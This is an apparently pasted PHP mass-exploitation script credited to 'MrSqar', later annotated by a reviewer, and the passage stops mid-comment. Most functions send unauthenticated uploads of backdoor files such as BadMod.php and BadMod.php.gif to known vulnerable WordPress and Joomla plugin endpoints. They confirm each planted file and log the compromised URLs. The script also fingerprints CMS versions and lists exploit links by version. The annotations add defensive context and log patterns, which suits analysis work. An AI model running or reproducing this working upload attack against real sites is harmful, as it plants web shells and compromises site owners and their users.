
Untitled

a guest May 27th, 2018 216 Never
<?php
/*
#*##*##*##*##*##*##*##*##*##*##*##*##*#
#*#                                 #*#
#*#  Coded by MrSqar Yemeni hacker  #*#
#*#                                 #*#
#*#     mail : mrsqar@gmail.com     #*#
#*#                                 #*#
#*#         MaDe In YeMeN           #*#
#*#                                 #*#
#*# Note: Don't change my copyright #*#
#*#          please , ok ?          #*#
#*#                                 #*#
#*#                                 #*#
#*##*##*##*##*##*##*##*##*##*##*##*##*#
*/

/*
 * Review annotation (analyst summary of this listing):
 * Command-line PHP script that defines one function per targeted CMS
 * component (WordPress, Joomla, Drupal). Each function sends an HTTP request
 * to a fixed path under a caller-supplied base URL -- in most cases a
 * multipart file upload of a local file from BackDoor/ -- and appends a URL to
 * result/Hacked.txt when its own success test passes.
 * The code that drives these functions is not in this listing; Header.php is
 * pulled in by require and is not shown.
 * Indicators that appear literally in this file: uploaded file names
 * BadMod.* and mrsqar.*, and the marker strings "Hacked", "MrSqar" and
 * "Yemeni" that the script fetches back to confirm a planted file.
 */

########################################
#//||||||||||| check root |||||||||||\\#
########################################
// Runs the external `id` command and continues only if its output contains
// the substring "root" anywhere (user name or any group name).
// NOTE(review): the functions visible in this listing only make outbound HTTP
// requests and append to result/Hacked.txt; whether Header.php needs elevated
// privileges cannot be determined from here.
$root = shell_exec("id");
if (!preg_match("/root/",$root)){
        system("clear");
        // ANSI escape sequence for bright red terminal text.
        $red    = "\e[91m";
        echo $red."\n[~] please run script as root "."\n\n";
        exit;
    }
##########################################
#//|||||||||||~ check curl ~|||||||||||\\#
##########################################
// Stops unless the PHP curl extension is loaded. On "y" it runs a fixed
// apt-get command through system() (no user input reaches the command line)
// and exits; any other answer exits immediately. Either way the script does
// not continue past this block when curl is missing.
if(!extension_loaded('curl')) {
        system("clear");
        $red    = "\e[91m";
        echo $red."\n[~]  curl is not installed pls install it by this command "."\n";
        echo "    install it for you ? (y/n) : ";
        // Reads up to 1024 bytes from standard input and strips whitespace.
        $install = trim(fgets(STDIN,1024));
        if ($install == "y"){
        $install = "sudo apt-get install php-curl -y";
        system("$install");
        exit();
            } else {
#########################################
#//||||||||||| exit script |||||||||||\\#
#########################################
                exit();

                }
        }
######################################################
#//|//|//|//|//|//|//|//|//|//|//|//|//|///|//|//|//|#
######################################################

#####################
## script go go :V ##
#####################

// Loads Header.php from the include path / working directory. Its contents
// are not part of this listing, so what it defines or executes is unknown.
require("Header.php");
###############################################
#//|||||||||||||  array  start |||||||||||||\\#
###############################################
// Static lookup table keyed by a WordPress version string. Each value is a
// printable text block listing URLs of public exploit-database entries.
// No code in this listing reads the table; presumably it is indexed with a
// detected version elsewhere -- TODO confirm against the caller.
// NOTE(review): the text stored under key '4.7' is labelled "4.7.1 vulns".
// For defenders the table is a list of versions the author considered worth
// flagging; sites on these releases should be on a supported, patched version.
$wordpress = array(
'4.7.1' => "
4.7.1 vulns [
\n
https://www.exploit-db.com/exploits/41497/
https://www.exploit-db.com/exploits/41224/
http://0day.today/exploit/description/27720
http://0day.today/exploit/description/26956
http://0day.today/exploit/description/26885
http://0day.today/exploit/description/26884
http://0day.today/exploit/description/26876
\n
]
\n
",
'4.7' => "
4.7.1 vulns [
https://www.exploit-db.com/exploits/41497/
https://www.exploit-db.com/exploits/41224/
http://0day.today/exploit/description/27720
http://0day.today/exploit/description/26956
http://0day.today/exploit/description/26885
http://0day.today/exploit/description/26884
http://0day.today/exploit/description/26876
\n
]
\n
",
'4.6' => "
4.6 vulns [\n
https://www.exploit-db.com/exploits/41962/
http://0day.today/exploit/description/25575
\n
]
\n
",


'4.5.3' => "
4.5.3 vulns [\n
https://www.exploit-db.com/exploits/40288/
http://0day.today/exploit/description/27237
http://0day.today/exploit/description/27236
\n
]
\n
",

'4.0' => "
4.0 vulns [\n
https://www.exploit-db.com/exploits/35413/
http://0day.today/exploit/description/27177
\n
]
\n
",

'4.2' => "
4.2 vulns [\n
https://www.exploit-db.com/exploits/36844/
http://0day.today/exploit/description/23993
\n
]
\n
",

'3.6' => "
3.6 vulns [\n
https://www.exploit-db.com/docs/28958.pdf
\n
]
\n
",

'3.4.2' => "
3.4.2 vulns [\n
http://0day.today/exploit/description/19896
http://0day.today/exploit/description/19876
http://0day.today/exploit/description/19447
https://www.exploit-db.com/exploits/37826/
\n
]
\n
",

'3.3.1' => "
3.3.1 vulns [\n
http://0day.today/exploit/description/19711
http://0day.today/exploit/description/18138
http://0day.today/exploit/description/17434
\n
]
\n
",

'3.1.3' => "
3.1.3 vulns [\n
https://www.exploit-db.com/exploits/17465/
\n
]
\n
",

'3.0.3' => "
3.0.3 vulns [\n
http://0day.today/exploit/description/25032
http://0day.today/exploit/description/20175
http://0day.today/exploit/description/15259
\n
]
\n
",

'3.0.1' => "
3.0.1 vulns [\n
http://0day.today/exploit/description/27164
http://0day.today/exploit/description/21153
http://0day.today/exploit/description/14864
http://0day.today/exploit/description/13702
\n
]
\n
",
);
// Placeholder table for Joomla: a single entry with an empty key and a
// whitespace-only value.
$joomla = array(
'' => "
 
"
);
###############################################
#//||||||||||||||  array  end ||||||||||||||\\#
###############################################

###############################################
#//|||||||||||| Functions start ||||||||||||\\#
###############################################
/**
 * Probes a Plupload example upload handler under $target and tries to place
 * a PHP file through it.
 *
 * Flow as written: GET {target}/plupload/examples/upload.php and continue
 * only if the body contains "jsonrpc"; send a multipart POST (fields "file"
 * and "name", both local files from BackDoor/) with no cookies or
 * credentials; GET the expected upload location and treat the string
 * "Hacked" in that response as confirmation. Confirmed URLs are appended to
 * result/Hacked.txt.
 *
 * Review notes: the "Failed" line is echoed after the success branch too, so
 * console output alone does not distinguish the outcomes; the else branch
 * repeats the identical probe URL before it checks the /js/plupload/ path.
 *
 * Defensive relevance: example upload handlers shipped with a library should
 * not be deployed to production, and upload directories should not execute
 * scripts. In access logs the pattern is GET, multipart POST, then GET of
 * uploads/BadMod.php on the paths below.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function plupload($target){
    // ANSI colour escape sequences used for console output.
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$target1 = $target."/plupload/examples/upload.php";
// '@' suppresses the warning on a failed fetch; $h is then false.
$h = @file_get_contents("$target1");
if(preg_match("/jsonrpc/",$h)){
$uploadfile="BackDoor/BadMod.jpg";
$uploadfile2="BackDoor/BadMod.php";
$uploadfile=realpath($uploadfile) ;
$uploadfile2=realpath($uploadfile2) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
  $cFile2 = curl_file_create($uploadfile2);
} else { //
  // Legacy '@path' upload syntax for PHP builds without curl_file_create.
  $cFile = '@' . realpath($uploadfile);
  $cFile2 = '@' . realpath($uploadfile2);
}
$post = array('file'=> $cFile,'name' => $cFile2);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
// The POST response is discarded: $result is overwritten with the URL to check.
$result = $target."/plupload/examples/uploads/BadMod.php";
$result = @file_get_contents("$result");
if(preg_match("/Hacked/",$result)){
echo $red."  [plupload] -============- ".$green." Done";
$hacked = fopen("result/Hacked.txt","a+");
$def = $target."/"."plupload/examples/uploads/BadMod.php";
fwrite($hacked,$def);
fwrite($hacked,"\n");
fclose($hacked);
}
echo $red."  [plupload] -============- ".$orange." Failed ";
}else{
// Reached when the first probe did not match; the same URL is probed again.
$target1 = $target."/plupload/examples/upload.php";
$h = @file_get_contents("$target1");
if(preg_match("/jsonrpc/",$h)){
$uploadfile="BackDoor/BadMod.jpg";
$uploadfile2="BackDoor/BadMod.php";
$uploadfile=realpath($uploadfile) ;
$uploadfile2=realpath($uploadfile2) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
  $cFile2 = curl_file_create($uploadfile2);
} else { //
  $cFile = '@' . realpath($uploadfile);
  $cFile2 = '@' . realpath($uploadfile2);
}
$post = array('file'=> $cFile,'name' => $cFile2);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
$result = $target."/js/plupload/examples/uploads/BadMod.php";
$result = @file_get_contents("$result");
if(preg_match("/Hacked/",$result)){
echo $red."  [plupload] -============- ".$green." Done";
$hacked = fopen("result/Hacked.txt","a+");
$def = $target."/js/plupload/examples/uploads/BadMod.php";
fwrite($hacked,$def);
fwrite($hacked,"\n");
fclose($hacked);
}
echo $red."  [plupload] -============- ".$orange." Failed ";
}
}
}
/**
 * Attempts a file upload through the uploadify.php handler bundled with the
 * "qualifire" WordPress theme path below.
 *
 * Flow as written: request the handler's headers and proceed unless the
 * status line contains "404"; send BackDoor/BadMod.php as multipart field
 * "Filedata" with no cookies or credentials; treat a trimmed response body
 * loosely equal to 1 as success and log {target}/BadMod.php to
 * result/Hacked.txt. The logged URL is not fetched back, so the entry is
 * unverified.
 *
 * Review note: "Failed" is echoed after the success branch as well.
 *
 * Defensive relevance: a theme-bundled upload script that accepts requests
 * without a session is the exposure; remove or update the theme and block
 * direct requests to this path. Log pattern: HEAD/GET followed by a
 * multipart POST to uploadify.php.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_qual($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$target1 = $target."/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php";
$h = @get_headers("$target1");
// $h[0] is the HTTP status line of the response.
if(!preg_match("/404/",$h[0])){
$uploadfile="BackDoor/BadMod.php";
$uploadfile=realpath($uploadfile) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
} else { //
  $cFile = '@' . realpath($uploadfile);
}
$post = array('Filedata'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
$result = trim($result);
// Loose comparison: the string "1" from the handler counts as success.
if($result == 1){
echo $red."  [wp_qual] -=============- ".$green." Done !";
$hacked = fopen("result/Hacked.txt","a+");
$def = $target."/"."BadMod.php";
fwrite($hacked,$def);
fwrite($hacked,"\n");
fclose($hacked);
}
echo $red."  [wp_qual] -=============- ".$orange." Failed ";
}
}
/**
 * Fingerprints a WordPress version from the page's generator meta tag and
 * echoes it.
 *
 * Fetches $target, collects every `meta name="generator" content="..."`
 * value, and for each one prints the text with "WordPress" removed, or
 * " UNKNOWN" when the value does not mention WordPress.
 *
 * Defensive relevance: the generator tag discloses the exact core version to
 * any visitor; suppressing it removes this signal, although keeping core
 * patched is what actually matters.
 *
 * @param string $target URL of the page to fetch; not validated.
 * @return void The version text is echoed; nothing is returned.
 */
function GetWpVer($target){
// Not error-suppressed: a failed fetch emits a PHP warning.
$r = file_get_contents("$target");
// PHP accepts '<' ... '>' as a bracket-style regex delimiter pair, so the
// leading '<' and trailing '>' delimit the pattern and are not matched.
preg_match_all('<meta name="generator" content="(.*)" />',$r,$re);
foreach($re[1] AS $version){
if(!preg_match("/WordPress/",$version)){
$version = " UNKNOWN";
}else{
$arr = "WordPress";
$version = str_replace($arr,"",$version);
$version = trim($version);
}
echo " ".$version;
}
}
/**
 * Attempts a file upload through the WordPress AJAX action
 * "wpbdp-file-field-upload".
 *
 * Flow as written: send BackDoor/BadMod.gif as multipart field "file" to
 * admin-ajax.php with no cookies or credentials; then fetch
 * /wp-content/uploads/20YY/MM/BadMod.gif (current year and month of the
 * machine running the script) and treat "Hacked" in the body as
 * confirmation. On success the URL is appended to result/Hacked.txt and both
 * the raw POST response and the URL are echoed. The log handle is not closed
 * here.
 *
 * Defensive relevance: an AJAX upload action reachable without a logged-in
 * session is the exposure; update or remove the plugin that registers it.
 * Log pattern: multipart POST to admin-ajax.php with this action value,
 * then GET of BadMod.gif under the dated uploads directory.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_bsn($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$target1 = $target."/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload";
$uploadfile="BackDoor/BadMod.gif";
$uploadfile=realpath($uploadfile) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
} else { //
  $cFile = '@' . realpath($uploadfile);
}
$post = array('file'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
// Month and two-digit year are taken from the local clock.
$m = date("m");
$y = date("y");
$result2 = $target."/wp-content/uploads/20$y/$m/BadMod.gif";
$src = @file_get_contents("$result2");
if(preg_match("/Hacked/",$src)){
echo $red."  [wp_bsn] -==============- ".$green." Done !";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$result2);
fwrite($hacked,"\n");
echo $result;
echo $result2;
}else{
echo $red. "  [wp_bsn] -==============- ".$orange."Failed"." \n";
}
}
/**
 * Attempts a file upload through the /jm-ajax/upload_file endpoint.
 *
 * Flow as written: GET the endpoint and continue only if the body contains
 * "files"; send BackDoor/BadMod.gif as multipart field "file" with no
 * cookies or credentials; then log
 * /wp-content/uploads/20YY/MM/BadMod.gif to result/Hacked.txt.
 *
 * Review note: the logged URL is never fetched back, so every entry written
 * by this function is unverified, and the log handle is not closed.
 *
 * Defensive relevance: an upload endpoint that answers unauthenticated
 * requests is the exposure; update or remove the plugin that serves it and
 * restrict accepted file types server-side. Log pattern: GET then multipart
 * POST to /jm-ajax/upload_file.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_jbm($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$target1 = $target."/jm-ajax/upload_file";
$src = @file_get_contents("$target1");
if(preg_match("/files/",$src)){
$uploadfile="BackDoor/BadMod.gif";
$uploadfile=realpath($uploadfile) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
} else { //
  $cFile = '@' . realpath($uploadfile);
}
$post = array('file'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
$m = date("m");
$y = date("y");
$result2 = $target."/wp-content/uploads/20$y/$m/BadMod.gif";
// "Done" is reported without inspecting $result or fetching $result2.
echo $red."  [wp_jbm] -==============- ".$green." Done !";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$result2);
fwrite($hacked,"\n");
}else{
echo $red. "  [wp_jbm] -==============- ".$orange."Failed"." \n";

}
}
/**
 * Fingerprints a Joomla version from the public language manifest and echoes
 * it.
 *
 * Fetches {url}/language/en-GB/en-GB.xml (twice), splits it into lines,
 * looks for the "metafile" element on the second or third line, strips the
 * surrounding markup tokens with str_replace and prints what is left as the
 * version. Prints " UNKNOWN" when neither line matches; prints nothing when
 * the response does not contain "xml".
 *
 * Defensive relevance: this manifest is readable by any visitor on a default
 * install and states the version; denying direct access to it removes the
 * signal, and keeping the CMS patched is what actually matters.
 *
 * @param string $url Base URL; the manifest path is appended, not validated.
 * @return void The version line is echoed; nothing is returned.
 */
function joom_ver($url){
    $green  = "\e[92m";
    $red    = "\e[91m";
$url = $url."/language/en-GB/en-GB.xml";
// Not error-suppressed: a failed fetch emits a PHP warning.
$source = file_get_contents("$url");
if(preg_match("/xml/",$source)){
$source = file_get_contents("$url");
$exp = explode("\n",$source);
// Drops the XML declaration line; the remaining indexes are not renumbered.
if(preg_match("/xml/",$exp[0])){
unset($exp[0]);
}
if(preg_match("/metafile/",$exp[1])){
// Replacement map: every listed token is removed from the line.
$arr = array(
'<' => "",
'metafile' => "",
'version' => "",
'=' => "",
'"' => "",
'client' => "",
'site' => "",
'>' => "",
);
$rb = str_replace(array_keys($arr),$arr,$exp[1]);
$version =  $red. "  [Version] -====- ".$green.trim($rb)."\n";
echo $version;
}elseif(preg_match("/metafile/",$exp[2])){
$arr = array(
'<' => "",
'metafile' => "",
'version' => "",
'=' => "",
'"' => "",
'client' => "",
'site' => "",
'>' => "",
);
$rb = str_replace(array_keys($arr),$arr,$exp[2]);
$version =  $red. "  [Version] -====- ".$green.trim($rb)."\n";
echo $version;
}
else{
$version =  $red. "  [Version] -====- ".$green." UNKNOWN"."\n";
echo $version;
}
}

}
/**
 * Attempts a file upload through the file-uploader.php script under the
 * "viral-optins" WordPress plugin path below.
 *
 * Flow as written: request the script's headers and proceed unless the
 * status line contains "404"; send BackDoor/BadMod.txt as multipart field
 * "Filedata" with no cookies or credentials; fetch
 * /wp-content/uploads/20YY/MM/BadMod.txt and treat "MrSqar" in the body as
 * confirmation; append the URL to result/Hacked.txt. The log handle is not
 * closed. The success line is labelled "[upload]", not "[wp_upload2]".
 *
 * Defensive relevance: a plugin upload script reachable without a session is
 * the exposure; update or remove the plugin. Log pattern: multipart POST to
 * file-uploader.php followed by GET of BadMod.txt under the dated uploads
 * directory.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_upload2($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$target1 = $target."/wp-content/plugins/viral-optins/api/uploader/file-uploader.php";
$h = @get_headers("$target1");
if(!preg_match("/404/",$h[0])){
$uploadfile="BackDoor/BadMod.txt";
$uploadfile=realpath($uploadfile) ;
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($uploadfile);
} else { //
  $cFile = '@' . realpath($uploadfile);
}
$post = array('Filedata'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"$target1");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
// Month and two-digit year are taken from the local clock.
$m = date("m");
$y = date("y");
$result2 = $target."/wp-content/uploads/20$y/$m/BadMod.txt";
$h2 = @file_get_contents("$result2");
if(@preg_match("/MrSqar/",$h2)){
echo $red."  [upload] -==============- ".$green." Done !";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$result2);
fwrite($hacked,"\n");
    }else{
echo $red. "  [wp_upload2] -==========- ".$orange."Failed"." \n";

}
}else{
echo $red. "  [wp_upload2] -==========- ".$orange."Failed"." \n";

}
}
/**
 * Attempts a file upload through the swfupload upload.php script under the
 * "blaze-slide-show-for-wordpress" plugin path below.
 *
 * Flow as written: send BackDoor/BadMod.php.gif as multipart field
 * "Filedata" with no cookies or credentials (no prior probe); fetch
 * BadMod.php.gif from the same plugin directory and treat "Hacked" in the
 * body as confirmation; append the URL to result/Hacked.txt.
 *
 * Defensive relevance: the double extension ".php.gif" is aimed at handlers
 * that check only the final extension while the web server may still hand
 * the file to PHP; validate the full file name and content type server-side
 * and do not execute scripts from plugin upload paths. Log pattern:
 * multipart POST to swfupload/js/upload.php followed by GET of
 * BadMod.php.gif.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_blazeS($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.php.gif";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$target1 = $target."/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php";
$post = array('Filedata'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The POST response is stored but never inspected.
$result=curl_exec ($ch);
curl_close ($ch);
$hack = $target."/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/BadMod.php.gif";
$source = @file_get_contents("$hack");
if(preg_match("/Hacked/",$source)){
$hacked = fopen("result/Hacked.txt","a+");
echo $red."  [wp_blazeS] -===========- ".$green." Done ! \n";
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}else{
echo $red. "  [wp_blazeS] -===========- ".$orange."Failed"." \n";
}
}
/**
 * Attempts a file upload through the WordPress AJAX action "getcountryuser".
 *
 * Flow as written: send BackDoor/BadMod.php as multipart field "popimg" to
 * admin-ajax.php?action=getcountryuser&cs=2 with no cookies or credentials
 * (no prior probe); fetch /wp-content/uploads/20YY/MM/BadMod.php and treat
 * "Hacked" in the body as confirmation; append the URL to result/Hacked.txt.
 *
 * Defensive relevance: an AJAX action that stores an uploaded file without a
 * logged-in session or type check is the exposure; update or remove the
 * plugin that registers it and deny PHP execution under wp-content/uploads.
 * Log pattern: multipart POST to admin-ajax.php with this action value, then
 * GET of BadMod.php under the dated uploads directory.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_blocker($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.php";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$target1 = $target."/wp-admin/admin-ajax.php?action=getcountryuser&cs=2";
$post = array('popimg'=> $cFile);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The POST response is stored but never inspected.
$result=curl_exec ($ch);
curl_close ($ch);
// Month and two-digit year are taken from the local clock.
$m = date("m");
$y = date("y");
$hack = $target."/wp-content/uploads/20$y/$m/BadMod.php";
$source2 = @file_get_contents("$hack");
if(preg_match("/Hacked/",$source2)){
echo $red."  [wp_blocker] -==========- ".$green." Done !\n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}else{
echo $red. "  [wp_blocker] -==========- ".$orange."Failed"." \n";
}
}
/**
 * Attempts a file upload through the upload.php script under the
 * "formcraft" WordPress plugin path below.
 *
 * Flow as written: GET the script and continue only if the body contains
 * "failed"; send BackDoor/mrsqar.png as multipart field "files[]" with no
 * cookies or credentials; split the response on the string "files", take
 * the fifth piece, strip JSON punctuation from it and use the remainder as
 * the stored file name; append the resulting URL to result/Hacked.txt.
 *
 * Review note: the constructed URL is never fetched back, so entries written
 * by this function are unverified.
 *
 * Defensive relevance: a plugin upload script reachable without a session is
 * the exposure; update or remove the plugin. Log pattern: GET then multipart
 * POST to file-upload/server/content/upload.php.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_formcraft($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/mrsqar.png";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$post = array('files[]'=> $cFile);
$target1 = $target."/wp-content/plugins/formcraft/file-upload/server/content/upload.php";
$source = @file_get_contents("$target1");
if(preg_match("/failed/",$source)){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result=curl_exec ($ch);
curl_close ($ch);
// Positional parsing of the response; presumably the handler returns JSON
// that names the stored file -- TODO confirm the response format.
$exp = explode("files",$result);
$arr = array(
"\/" => "",
'"' => "",
"}" => "",
"{" => "",

);
$rb = str_replace(array_keys($arr),$arr,$exp[4]);
$hack = $target."/wp-content/plugins/formcraft/file-upload/server/content/files/$rb";
echo $red."  [wp_formcraft] -========- ".$green." Done ! \n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}else{
echo $red. "  [wp_formcraft] -========- ".$orange."Failed"." \n";
}
}
/**
 * Attempts a file upload through sam-ajax-admin.php under the
 * "simple-ads-manager" WordPress plugin path below.
 *
 * Flow as written: GET the plugin's readme.txt and continue only if it
 * contains "Simple" (presence check for the plugin); send a multipart POST
 * with fields path="./", "uplaodfile" (spelled as in the source) carrying
 * BackDoor/BadMod.php, and action="upload_ad_image", with no cookies or
 * credentials; fetch BadMod.php from the plugin directory and treat "Hacked"
 * in the body as confirmation; append the URL to result/Hacked.txt.
 *
 * Defensive relevance: an admin AJAX script that can be called directly
 * without a session, and that accepts a caller-chosen destination path, is
 * the exposure; update or remove the plugin. A publicly readable readme.txt
 * also reveals that the plugin is installed. Log pattern: GET readme.txt,
 * multipart POST to sam-ajax-admin.php, GET BadMod.php.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function wp_ads($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.php";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$target1 = $target."/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php";
$target2 = $target."/wp-content/plugins/simple-ads-manager/readme.txt";
$source = @file_get_contents("$target2");
if(preg_match("/Simple/",$source)){
$post = array('path' => './','uplaodfile'=> $cFile,'action' => "upload_ad_image");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The POST response is stored but never inspected.
$result=curl_exec ($ch);
curl_close ($ch);
$hack = $target."/wp-content/plugins/simple-ads-manager/BadMod.php";
$source2 = @file_get_contents("$hack");
if(preg_match("/Hacked/",$source2)){
echo $red."  [wp_ads] -==============- ".$green." Done !\n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}else{
echo $red. "  [wp_ads] -==============- ".$orange."Failed"." \n";
}
}
else{
echo $red. "  [wp_ads] -==============- ".$orange."Failed"." \n";
}
}
/**
 * Attempts a file upload through the CSV import view of the Joomla
 * component com_fabrik.
 *
 * Flow as written: GET the import view and continue only if the body
 * contains "CSV"; send a multipart POST carrying BackDoor/BadMod.txt as
 * "userfile" together with the import form fields, with no cookies or
 * credentials; fetch {target}/media/BadMod.txt and treat "Yemeni" in the
 * body as confirmation; append the URL to result/Hacked.txt.
 *
 * Defensive relevance: an import form that stores the uploaded file in a
 * web-served directory and is reachable without a session is the exposure;
 * update or remove the component and require authentication for import
 * views. Log pattern: GET and multipart POST to index.php with
 * option=com_fabrik, then GET /media/BadMod.txt.
 *
 * @param string $target Base URL; concatenated with fixed paths, not validated.
 * @return void Status is echoed; nothing is returned.
 */
function com_fabrik($target){
    $green  = "\e[92m";
    $orange = "\e[38;5;208m";
    $red    = "\e[91m";
$file = "BackDoor/BadMod.txt";
$file = realpath($file);
if (function_exists('curl_file_create')) { // php 5.5+
  $cFile = curl_file_create($file);
} else { //
  $cFile = '@' . realpath($file);
}
$target1 = $target."/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0";
$source = @file_get_contents("$target1");
if(preg_match("/CSV/",$source)){
$post = array('userfile'=> $cFile,'drop_data' => "1",'overwrite' => "1",'field_delimiter' => "," , 'text_delimiter' => '"','option' => "com_fabrik",'controller' => "import",'view' => "import",'task' => "doimport",'tableid' => "0");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target1);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// The POST response is stored but never inspected.
$result=curl_exec ($ch);
curl_close ($ch);
$hack = $target."/media/BadMod.txt";
$source2 = @file_get_contents("$hack");
if(preg_match("/Yemeni/",$source2)){
echo $red."  [com_fabrik] ====> ".$green." Done ! \n";
$hacked = fopen("result/Hacked.txt","a+");
fwrite($hacked,$hack);
fwrite($hacked,"\n");
fclose($hacked);
}else{
echo $red. "  [com_fabrik] ====> ".$orange."Failed"." \n";
}
}else{
echo $red. "  [com_fabrik] ====> ".$orange."Failed"." \n";
}
}
/**
 * Attempts a file upload through a bundled jquery-file-upload server
 * endpoint at /assets/global/plugins/jquery-file-upload/server/php/.
 *
 * Flow as written: GET the endpoint and continue only if the body contains
 * "files"; send BackDoor/BadMod.php as multipart field "files" with no
